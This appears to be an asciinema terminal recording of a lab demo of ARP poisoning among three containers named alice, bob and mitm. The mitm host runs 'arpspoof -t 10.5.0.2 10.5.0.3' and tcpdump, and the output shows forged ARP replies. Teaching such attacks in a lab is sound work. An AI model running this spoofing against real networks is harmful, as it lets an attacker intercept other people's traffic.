[24.573824, "o", "\u001b[29;31Ha\u001b[15;22H"]
[24.649147, "o", "\u001b[29;32Hb\u001b[15;22H"]
[24.723174, "o", "\u001b[29;33Hl\u001b[15;22H"]
[24.798635, "o", "\u001b[29;34He\u001b[15;22H"]
[24.874592, "o", "\u001b[29;35H \u001b[15;22H"]
[24.948783, "o", "\u001b[29;36H#\u001b[15;22H"]
[25.024019, "o", "\u001b[29;37H#\u001b[15;22H"]
[25.10112, "o", "\u001b[29;38H#\u001b[15;22H"]
[25.175736, "o", "\u001b[29;39H#\u001b[15;22H"]
[25.251626, "o", "\u001b[29;40H#\u001b[15;22H"]
[25.256343, "o", "\u001b[30;1H[10.5.0.3] bob / # \u001b[15;22H"]
[25.331146, "o", "\u001b[30;20Ha\u001b[15;22H"]
[25.407323, "o", "\u001b[30;21Hr\u001b[15d"]
[25.480124, "o", "\u001b[30dp\u001b[15;22H"]
[25.555608, "o", "\u001b[30;23H \u001b[15;22H"]
[25.631306, "o", "\u001b[30;24H-\u001b[15;22H"]
[25.707168, "o", "\u001b[30;25Ha\u001b[15;22H"]
[25.710731, "o", "\u001b[?25l\u001b[17;1Heth0      Link encap:Ethernet  HWaddr 02:42:0A:05:00:03  \u001b[14X\r\n          inet addr:10.5.0.3  Bcast:10.5.255.255  Mask:255.255.0.0\u001b[5X\r\n[10.5.0.3] bob / # # ping ALICE to fill ARP table\u001b[22X\r\n[10.5.0.3] bob / # ping 10.5.0.2 -c 1\u001b[34X\r\nPING 10.5.0.2 (10.5.0.2): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.2: seq=0 ttl=64 time=0.123 ms\u001b[21X\u001b[23;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.2 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.123/0.123/0.123 ms\u001b[26X\r\n[10.5.0.3] bob / # # checking ARP table\u001b[32X\r\n[10.5.0.3] bob / # ##### ARP table #####\u001b[31X\u001b[29;71H\u001b[1K\r[10.5.0.3] bob / # arp -a\u001b[30;71H\u001b[1K\u001b[?12l\u001b[?25h\u001b[15;22H"]
[25.712028, "o", "\u001b[?25l\u001b[17;1H          inet addr:10.5.0.3  Bcast:10.5.255.255  Mask:255.255.0.0\u001b[5X\r\n[10.5.0.3] bob / # # ping ALICE to fill ARP table\u001b[22X\r\n[10.5.0.3] bob / # ping 10.5.0.2 -c 1\u001b[34X\r\nPING 10.5.0.2 (10.5.0.2): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.2: seq=0 ttl=64 time=0.123 ms\u001b[21X\u001b[22;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.2 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.123/0.123/0.123 ms\u001b[26X\r\n[10.5.0.3] bob / # # checking ARP table\u001b[32X\r\n[10.5.0.3] bob / # ##### ARP table #####\u001b[31X\u001b[28;71H\u001b[1K\r[10.5.0.3] bob / # arp -a\r\narp-alice-1.arp_arp (10.5.0.2) at 02:42:0a:05:00:02 [ether]  on eth0\u001b[3X\u001b[30;71H\u001b[1K\u001b[?12l\u001b[?25h\u001b[15;22H"]
[25.712901, "o", "\u001b[?25l\u001b[17;1H[10.5.0.3] bob / # # ping ALICE to fill ARP table\u001b[22X\r\n[10.5.0.3] bob / # ping 10.5.0.2 -c 1\u001b[34X\r\nPING 10.5.0.2 (10.5.0.2): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.2: seq=0 ttl=64 time=0.123 ms\u001b[21X\u001b[21;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.2 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.123/0.123/0.123 ms\u001b[26X\r\n[10.5.0.3] bob / # # checking ARP table\u001b[32X\r\n[10.5.0.3] bob / # ##### ARP table #####\u001b[31X\u001b[27;71H\u001b[1K\r[10.5.0.3] bob / # arp -a\r\narp-alice-1.arp_arp (10.5.0.2) at 02:42:0a:05:00:02 [ether]  on eth0\u001b[3X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\u001b[30;71H\u001b[1K\u001b[?12l\u001b[?25h\u001b[15;22H"]
[25.716837, "o", "\u001b[30;1H[10.5.0.3] bob / # \u001b[15;22H"]
[25.786136, "o", "\u001b[18;77H#\u001b[15;22H"]
[25.861433, "o", "\u001b[18;78H \u001b[15;22H"]
[25.938167, "o", "\u001b[18;79Hl\u001b[15;22H"]
[26.013202, "o", "\u001b[18;80He\u001b[15;22H"]
[26.08958, "o", "\u001b[18;81Ht\u001b[15;22H"]
[26.163391, "o", "\u001b[18;82Hc\u001b[15;22H"]
[26.237973, "o", "\u001b[18;83H \u001b[15;22H"]
[26.313435, "o", "\u001b[18;84Hw\u001b[15;22H"]
[26.387597, "o", "\u001b[18;85Ha\u001b[15;22H"]
[26.464312, "o", "\u001b[18;86Ht\u001b[15;22H"]
[26.539933, "o", "\u001b[18;87Hc\u001b[15;22H"]
[26.615439, "o", "\u001b[18;88Hh\u001b[15;22H"]
[26.691795, "o", "\u001b[18;89H \u001b[15;22H"]
[26.764205, "o", "\u001b[18;90Hp\u001b[15;22H"]
[26.840106, "o", "\u001b[18;91Ha\u001b[15;22H"]
[26.913224, "o", "\u001b[18;92Hc\u001b[15;22H"]
[26.990889, "o", "\u001b[18;93Hk\u001b[15;22H"]
[27.065566, "o", "\u001b[18;94Ha\u001b[15;22H"]
[27.140764, "o", "\u001b[18;95Hg\u001b[15;22H"]
[27.215719, "o", "\u001b[18;96He\u001b[15;22H"]
[27.288602, "o", "\u001b[18;97Hs\u001b[15;22H"]
[27.362199, "o", "\u001b[18;98H \u001b[15;22H"]
[27.438351, "o", "\u001b[18;99H.\u001b[15;22H"]
[27.511947, "o", "\u001b[18;100H.\u001b[15;22H"]
[27.587981, "o", "\u001b[18;101H.\u001b[15;22H"]
[27.590904, "o", "\u001b[20;73H\u001b[34m\u001b[1m\u001b(0lqq\u001b(B\u001b(B\u001b[m\u001b[34m\u001b[1m(\u001b[31mroot__mitm\u001b[34m)-[\u001b[39m/\u001b[34m]\u001b[21;73H\u001b(0mq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[15;22H"]
[27.593122, "o", "\u001b[?25l\u001b[1;72H\u001b[32m\u001b(0x\u001b[2;72Hx\u001b[3;72Hx\u001b[4;72Hx\u001b[5;72Hx\u001b[6;72Hx\u001b[7;72Hx\u001b[8;72Hx\u001b[9;72Hx\u001b[10;72Hx\u001b[11;72Hx\u001b[12;72Hx\u001b[13;72Hx\u001b[14;72Hx\u001b[15;72Hx\r\nqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqn\u001b[39mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\u001b[17;72Hx\u001b[18;72Hx\u001b[19;72Hx\u001b[20;72Hx\u001b[21;72Hx\u001b[22;72Hx\u001b[23;72Hx\u001b[24;72Hx\u001b[25;72Hx\u001b[26;72Hx\u001b[27;72Hx\u001b[28;72Hx\u001b[29;72Hx\u001b[30;72Hx\u001b(B\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[15;22H"]
[27.666183, "o", "\u001b[21;77Ht\u001b[15;22H"]
[27.740736, "o", "\u001b[21;78Hc\u001b[15;22H"]
[27.816739, "o", "\u001b[21;79Hp\u001b[15;22H"]
[27.893483, "o", "\u001b[21;80Hd\u001b[15;22H"]
[27.968263, "o", "\u001b[21;81Hu\u001b[15;22H"]
[28.04338, "o", "\u001b[21;82Hm\u001b[15;22H"]
[28.119449, "o", "\u001b[21;83Hp\u001b[15;22H"]
[28.194359, "o", "\u001b[21;84H \u001b[15;22H"]
[28.272233, "o", "\u001b[21;85H-\u001b[15;22H"]
[28.348082, "o", "\u001b[21;86Hn\u001b[15;22H"]
[28.368728, "o", "\u001b[22;73Htcpdump: verbose output suppressed, use -v[v]... for full protocol de\u001b[23;73Hcode\u001b[24;73Hlistening on eth0, link-type EN10MB (Ethernet), snapshot length 26214\u001b[25;73H4 bytes\u001b[15;22H"]
[28.425913, "o", "#"]
[28.502793, "o", " "]
[28.577942, "o", "l"]
[28.654425, "o", "e"]
[28.729129, "o", "t"]
[28.804884, "o", "s"]
[28.879077, "o", " "]
[28.954528, "o", "p"]
[29.029867, "o", "i"]
[29.104302, "o", "n"]
[29.180786, "o", "g"]
[29.255429, "o", " "]
[29.331296, "o", "B"]
[29.405656, "o", "O"]
[29.481655, "o", "B"]
[29.558322, "o", " "]
[29.6362, "o", "a"]
[29.710772, "o", "g"]
[29.78525, "o", "a"]
[29.862297, "o", "i"]
[29.936919, "o", "n"]
[29.939724, "o", "\u001b[?25l\u001b[H[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.131 ms\u001b[21X\u001b[4;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.131/0.131/0.131 ms\u001b[26X\r\n[10.5.0.2] alice / # # checking ARP table\u001b[30X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[10;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address\u001b[25X\r\n[10.5.0.2] alice / # # lets ping BOB again\u001b[29X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[29.942084, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[30.015424, "o", "#"]
[30.092191, "o", " "]
[30.164647, "o", "t"]
[30.242165, "o", "c"]
[30.317224, "o", "p"]
[30.392795, "o", "d"]
[30.467233, "o", "u"]
[30.541742, "o", "m"]
[30.618932, "o", "p"]
[30.694818, "o", " "]
[30.76968, "o", "p"]
[30.844207, "o", "a"]
[30.922365, "o", "n"]
[30.99858, "o", "e"]
[31.072486, "o", "l"]
[31.147908, "o", " "]
[31.223072, "o", "s"]
[31.299354, "o", "h"]
[31.375607, "o", "o"]
[31.448694, "o", "w"]
[31.525221, "o", ":"]
[31.601115, "o", " "]
[31.677844, "o", "n"]
[31.751818, "o", "o"]
[31.827074, "o", "t"]
[31.899644, "o", "h"]
[31.973654, "o", "i"]
[32.050518, "o", "n"]
[32.124599, "o", "g"]
[32.128158, "o", "\u001b[?25l\u001b[HPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.131 ms\u001b[21X\u001b[3;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.131/0.131/0.131 ms\u001b[26X\r\n[10.5.0.2] alice / # # checking ARP table\u001b[30X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[9;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address\u001b[25X\r\n[10.5.0.2] alice / # # lets ping BOB again\u001b[29X\r\n[10.5.0.2] alice / # # tcpdump panel show: nothing\u001b[21X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[32.130343, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[32.204035, "o", "p"]
[32.280336, "o", "i"]
[32.355872, "o", "n"]
[32.429745, "o", "g"]
[32.503383, "o", " "]
[32.578957, "o", "1"]
[32.653143, "o", "0"]
[32.72611, "o", "."]
[32.80256, "o", "5"]
[32.878783, "o", "."]
[32.953493, "o", "0"]
[33.029111, "o", "."]
[33.104874, "o", "3"]
[33.179121, "o", " "]
[33.254868, "o", "-"]
[33.329709, "o", "c"]
[33.404891, "o", " "]
[33.483412, "o", "1"]
[33.48608, "o", "\u001b[?25l\u001b[H64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.131 ms\u001b[21X\u001b[2;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.131/0.131/0.131 ms\u001b[26X\r\n[10.5.0.2] alice / # # checking ARP table\u001b[30X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[8;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address\u001b[25X\r\n[10.5.0.2] alice / # # lets ping BOB again\u001b[29X\r\n[10.5.0.2] alice / # # tcpdump panel show: nothing\u001b[21X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[33.487783, "o", "\u001b[?25l\u001b[H[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[2;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address\u001b[25X\r\n[10.5.0.2] alice / # # lets ping BOB again\u001b[29X\r\n[10.5.0.2] alice / # # tcpdump panel show: nothing\u001b[21X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.180 ms\u001b[21X\u001b[11;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r"]
[33.491113, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[33.56023, "o", "\u001b[2;77H#\u001b[15;22H"]
[33.635633, "o", "\u001b[2;78H \u001b[15;22H"]
[33.7122, "o", "\u001b[2;79Hl\u001b[15;22H"]
[33.78498, "o", "\u001b[2;80He\u001b[15;22H"]
[33.860474, "o", "\u001b[2;81Ht\u001b[15;22H"]
[33.936481, "o", "\u001b[2;82Hs\u001b[15;22H"]
[34.009647, "o", "\u001b[2;83H \u001b[15;22H"]
[34.085551, "o", "\u001b[2;84Hp\u001b[15;22H"]
[34.160232, "o", "\u001b[2;85Ho\u001b[15;22H"]
[34.235815, "o", "\u001b[2;86Hi\u001b[15;22H"]
[34.310516, "o", "\u001b[2;87Hs\u001b[15;22H"]
[34.386253, "o", "\u001b[2;88Ho\u001b[15;22H"]
[34.462617, "o", "\u001b[2;89Hn\u001b[15;22H"]
[34.536936, "o", "\u001b[2;90H \u001b[15;22H"]
[34.610309, "o", "\u001b[2;91Ht\u001b[15;22H"]
[34.68452, "o", "\u001b[2;92Hh\u001b[15;22H"]
[34.760611, "o", "\u001b[2;93He\u001b[15;22H"]
[34.835212, "o", "\u001b[2;94H \u001b[15;22H"]
[34.910717, "o", "\u001b[2;95HA\u001b[15;22H"]
[34.985493, "o", "\u001b[2;96HR\u001b[15;22H"]
[35.060955, "o", "\u001b[2;97HP\u001b[15;22H"]
[35.136747, "o", "\u001b[2;98H \u001b[15;22H"]
[35.21185, "o", "\u001b[2;99Ht\u001b[15;22H"]
[35.285599, "o", "\u001b[2;100Ha\u001b[15;22H"]
[35.361218, "o", "\u001b[2;101Hb\u001b[15;22H"]
[35.438582, "o", "\u001b[2;102Hl\u001b[15;22H"]
[35.51287, "o", "\u001b[2;103He\u001b[15;22H"]
[35.588353, "o", "\u001b[2;104H \u001b[15;22H"]
[35.664164, "o", "\u001b[2;105H.\u001b[15;22H"]
[35.740127, "o", "\u001b[2;106H.\u001b[15;22H"]
[35.813018, "o", "\u001b[2;107H.\u001b[15;22H"]
[35.815557, "o", "\u001b[4;73H\u001b[34m\u001b[1m\u001b(0lqq\u001b(B\u001b(B\u001b[m\u001b[34m\u001b[1m(\u001b[31mroot__mitm\u001b[34m)-[\u001b[39m/\u001b[34m]\u001b[5;73H\u001b(0mq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[15;22H"]
[35.817673, "o", "\u001b[?25l\u001b[1;72H\u001b[32m\u001b(0x\u001b[2;72Hx\u001b[3;72Hx\u001b[4;72Hx\u001b[5;72Hx\u001b[6;72Hx\u001b[7;72Hx\u001b[8;72Hx\u001b[9;72Hx\u001b[10;72Hx\u001b[11;72Hx\u001b[12;72Hx\u001b[13;72Hx\u001b[14;72Hx\u001b[15;72Hx\r\nqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqn\u001b[39mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\u001b[17;72Hx\u001b[18;72Hx\u001b[19;72Hx\u001b[20;72Hx\u001b[21;72Hx\u001b[22;72Hx\u001b[23;72Hx\u001b[24;72Hx\u001b[25;72Hx\u001b[26;72Hx\u001b[27;72Hx\u001b[28;72Hx\u001b[29;72Hx\u001b[30;72Hx\u001b(B\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[15;22H"]
[35.892134, "o", "\u001b[5;77Ha\u001b[15;22H"]
[35.966657, "o", "\u001b[5;78Hr\u001b[15;22H"]
[36.043479, "o", "\u001b[5;79Hp\u001b[15;22H"]
[36.119885, "o", "\u001b[5;80Hs\u001b[15;22H"]
[36.194278, "o", "\u001b[5;81Hp\u001b[15;22H"]
[36.268779, "o", "\u001b[5;82Ho\u001b[15;22H"]
[36.344164, "o", "\u001b[5;83Ho\u001b[15;22H"]
[36.420547, "o", "\u001b[5;84Hf\u001b[15;22H"]
[36.494768, "o", "\u001b[5;85H \u001b[15;22H"]
[36.568412, "o", "\u001b[5;86H-\u001b[15;22H"]
[36.643956, "o", "\u001b[5;87Ht\u001b[15;22H"]
[36.719637, "o", "\u001b[5;88H \u001b[15;22H"]
[36.795285, "o", "\u001b[5;89H1\u001b[15;22H"]
[36.870552, "o", "\u001b[5;90H0\u001b[15;22H"]
[36.944556, "o", "\u001b[5;91H.\u001b[15;22H"]
[37.020222, "o", "\u001b[5;92H5\u001b[15;22H"]
[37.093994, "o", "\u001b[5;93H.\u001b[15;22H"]
[37.167429, "o", "\u001b[5;94H0\u001b[15;22H"]
[37.243605, "o", "\u001b[5;95H.\u001b[15;22H"]
[37.319656, "o", "\u001b[5;96H2\u001b[15;22H"]
[37.395119, "o", "\u001b[5;97H \u001b[15;22H"]
[37.470114, "o", "\u001b[5;98H \u001b[15;22H"]
[37.546817, "o", "\u001b[5;99H1\u001b[15;22H"]
[37.619172, "o", "\u001b[5;100H0\u001b[15;22H"]
[37.695293, "o", "\u001b[5;101H.\u001b[15;22H"]
[37.770285, "o", "\u001b[5;102H5\u001b[15;22H"]
[37.844525, "o", "\u001b[5;103H.\u001b[15;22H"]
[37.917932, "o", "\u001b[5;104H0\u001b[15;22H"]
[37.994981, "o", "\u001b[5;105H.\u001b[15;22H"]
[38.069692, "o", "\u001b[5;106H3\u001b[15;22H"]
[38.090288, "o", "\u001b[6;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[7;73H0:4\u001b[15;22H"]
[38.141422, "o", "\u001b[26;73H12:43:31.808252 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[27;73H8\u001b[15;22H"]
[40.091986, "o", "\u001b[8;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[9;73H0:4\u001b[15;22H"]
[40.117809, "o", "\u001b[28;73H12:43:33.808675 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[29;73H8\u001b[15;22H"]
[40.14881, "o", "#"]
[40.226769, "o", " "]
[40.302663, "o", "l"]
[40.379246, "o", "e"]
[40.455272, "o", "t"]
[40.530365, "o", "s"]
[40.606135, "o", " "]
[40.68169, "o", "p"]
[40.754672, "o", "i"]
[40.830114, "o", "n"]
[40.906548, "o", "g"]
[40.982117, "o", " "]
[41.057731, "o", "B"]
[41.13315, "o", "O"]
[41.2084, "o", "B"]
[41.284131, "o", " "]
[41.359367, "o", "n"]
[41.434258, "o", "o"]
[41.511283, "o", "w"]
[41.514331, "o", "\u001b[?25l\u001b[1;71H\u001b[1K\u001b[H[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address\u001b[25X\r\n[10.5.0.2] alice / # # lets ping BOB again\u001b[29X\r\n[10.5.0.2] alice / # # tcpdump panel show: nothing\u001b[21X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.180 ms\u001b[21X\u001b[10;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\r\n[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[41.516023, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[41.589736, "o", "#"]
[41.665443, "o", " "]
[41.740632, "o", "c"]
[41.817503, "o", "h"]
[41.890667, "o", "e"]
[41.966936, "o", "c"]
[42.041453, "o", "k"]
[42.092792, "o", "\u001b[10;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[11;73H0:4\u001b[15;29H"]
[42.093895, "o", "\u001b[?25l\u001b[17;73H\u001b[K\u001b[34m\u001b[1m\u001b(0\nlqq\u001b(B\u001b(B\u001b[m\u001b[34m\u001b[1m(\u001b[31mroot__mitm\u001b[34m)-[\u001b[39m/\u001b[34m]\u001b(B\u001b[m\u001b[K\u001b[34m\u001b[1m\u001b(0\u001b[19;73Hmq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m tcpdump -n\u001b[K\u001b[20;73Htcpdump: verbose output suppressed, use -v[v]... for full protocol de\u001b[21;73Hcode\u001b[K\u001b[22;73Hlistening on eth0, link-type EN10MB (Ethernet), snapshot length 26214\u001b[23;73H4 bytes\u001b[K\u001b[24;73H12:43:31.808252 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:33.808675 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:35.809161 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;29H"]
[42.116575, "o", " "]
[42.19008, "o", "t"]
[42.26659, "o", "h"]
[42.341797, "o", "e"]
[42.416699, "o", " "]
[42.493093, "o", "t"]
[42.567733, "o", "c"]
[42.643569, "o", "p"]
[42.719797, "o", "d"]
[42.792834, "o", "u"]
[42.868097, "o", "m"]
[42.943127, "o", "p"]
[43.016438, "o", " "]
[43.089295, "o", "f"]
[43.165208, "o", "o"]
[43.241147, "o", "r"]
[43.315238, "o", " "]
[43.391035, "o", "s"]
[43.463427, "o", "t"]
[43.540148, "o", "e"]
[43.615991, "o", "a"]
[43.69211, "o", "l"]
[43.765857, "o", "e"]
[43.840754, "o", "d"]
[43.916124, "o", " "]
[43.991557, "o", "p"]
[44.067967, "o", "a"]
[44.09258, "o", "\u001b[12;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[13;73H0:4\u001b[15;56H"]
[44.143562, "o", "c"]
[44.17235, "o", "\u001b[?25l\u001b[34m\u001b[1m\u001b(0\u001b[17;73Hmq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m tcpdump -n\u001b[K\u001b[18;73Htcpdump: verbose output suppressed, use -v[v]... for full protocol de\u001b[19;73Hcode\u001b[K\u001b[20;73Hlistening on eth0, link-type EN10MB (Ethernet), snapshot length 26214\u001b[21;73H4 bytes\u001b[K\u001b[22;73H12:43:31.808252 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:33.808675 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:35.809161 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:37.809591 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;57H"]
[44.218735, "o", "k"]
[44.295083, "o", "a"]
[44.369125, "o", "g"]
[44.444574, "o", "e"]
[44.519634, "o", "s"]
[44.522412, "o", "\u001b[?25l\u001b[Harp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address\u001b[25X\r\n[10.5.0.2] alice / # # lets ping BOB again\u001b[29X\r\n[10.5.0.2] alice / # # tcpdump panel show: nothing\u001b[21X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.180 ms\u001b[21X\u001b[9;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\r\n[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\r\n[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[44.524677, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[44.596387, "o", "p"]
[44.671099, "o", "i"]
[44.746593, "o", "n"]
[44.822993, "o", "g"]
[44.899131, "o", " "]
[44.974332, "o", "1"]
[45.05025, "o", "0"]
[45.125309, "o", "."]
[45.200108, "o", "5"]
[45.273528, "o", "."]
[45.347438, "o", "0"]
[45.424187, "o", "."]
[45.50047, "o", "3"]
[45.575616, "o", " "]
[45.650582, "o", "-"]
[45.725793, "o", "c"]
[45.801181, "o", " "]
[45.875131, "o", "1"]
[45.877705, "o", "\u001b[?25l\u001b[Harp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address\u001b[25X\r\n[10.5.0.2] alice / # # lets ping BOB again\u001b[29X\r\n[10.5.0.2] alice / # # tcpdump panel show: nothing\u001b[21X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.180 ms\u001b[21X\u001b[8;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\r\n[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\r\n[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
